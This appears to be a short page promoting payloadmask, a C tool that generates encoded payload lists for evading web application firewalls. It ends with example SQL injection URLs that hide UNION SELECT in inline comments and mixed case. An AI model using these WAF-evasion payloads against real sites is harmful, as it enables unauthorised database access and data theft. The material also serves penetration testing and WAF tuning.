payloadmask: Web Payload list editor to use techniques to try bypass web application firewall
Payloadmask is an Open Source Tool to generate payload list to try bypass Web Application Firewall, you can use a lot list of encodes and techniques to convert your payload list.
Why is this tool made in C language?
- C has a high delay time for writing and debugging, but no pain no gain, have a fast performance, addition of this point, the C language is run at any architecture like Mips, ARM and others… at the future can follow mobile implementations. other benefits of C, have a good and high profile to write optimizations if you think to write some lines in ASSEMBLY code with AES-NI or SiMD instructions, I think is a good choice.
- Why you do not use POO ? in this project I follow ”KISS” principle: http://pt.wikipedia.org/wiki/Keep It Simple
- C language has a lot of old school dudes like a kernel hacker…
git clone https://github.com/CoolerVoid/payloadmask.git
WAF stands for Web Application Firewall. It is widely used nowadays to detect and defend SQL Injections and XSS…
• You can use comments to bypass WAF:
http://www.site.com/index.php?page id=-15 /*!UNION*//*!SELECT*/ 0,1,2,3…
• You can also change the Case of the Command:
http://www.site.com/index.php?page id=-15 UnIoN sELecT 0,1,2,3…
• You can combine methods:
http://www.site.com/index.php?page id=-15 /*!uNIOn*//*!sElECt*/ 0,1,2,3.